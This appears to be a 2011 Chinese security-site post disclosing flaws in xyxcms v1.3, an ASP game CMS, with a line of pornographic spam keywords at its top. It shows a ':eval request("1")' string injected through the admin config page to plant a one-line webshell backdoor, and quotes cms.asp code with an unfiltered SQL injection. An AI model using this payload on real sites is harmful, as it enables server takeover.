亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

xyxcms v1.3 小游戲CMS 漏洞說(shuō)明

  發(fā)布時(shí)間:2011-03-11 11:59:35   作者:佚名   我要評(píng)論
國(guó)內(nèi)最專(zhuān)業(yè)的ASP網(wǎng)站內(nèi)容管理系統(tǒng)-小游戲管理系統(tǒng),他將是您輕松建站的首選利器。挺好的一個(gè)系統(tǒng),就是有點(diǎn)小問(wèn)題,大家可以修改下。

國(guó)內(nèi)最專(zhuān)業(yè)的ASP網(wǎng)站內(nèi)容管理系統(tǒng)-小游戲管理系統(tǒng),他將是您輕松建站的首選利器。小游戲CMS系統(tǒng)對(duì)站點(diǎn)管理和創(chuàng)造編輯都有好處,無(wú)論是CMS系統(tǒng)的易用性和功能的完善性,都處于領(lǐng)先優(yōu)勢(shì)!網(wǎng)站的編輯、發(fā)布、管理人員可輕松便捷的通過(guò)小游戲CMS系統(tǒng)來(lái)提交修改、審批、發(fā)布內(nèi)容。

  [xyxcms]
  版本信息:V1.3 正式版
  軟件大小:1.66M
  更新時(shí)間:2010年8月6日
  官方:http://www.xyxcms.com/
  漏洞文件: cms.asp
  程序雖小。 總會(huì)遇到!
  鄙視掛馬者。!
  學(xué)習(xí)之用。 后果自負(fù)。
  后臺(tái)拿webshell:
  admin/admin_config.asp
  網(wǎng)站地址: 插入 ":eval request("1"):'

復(fù)制代碼
代碼如下:

  inc/config.asp 一句話后門(mén)
  act=request("action")
  id=trim(request("id"))
  ................'省略
  if act="getding" then call getding
  ....................'省略
  sub getding
  id=request("id") '沒(méi)過(guò)濾
  set rs=server.createobject("adodb.recordset")
  sql="select ding from flash where id="&id
  rs.open sql,conn,1,1
  if not rs.eof then
  if isnull(rs(0)) then
  response.Write(0)
  else
  response.Write(rs(0))
  end if
  else
  response.Write(0)
  end if
  rs.close
  set rs=nothing
  end sub


相關(guān)文章

最新評(píng)論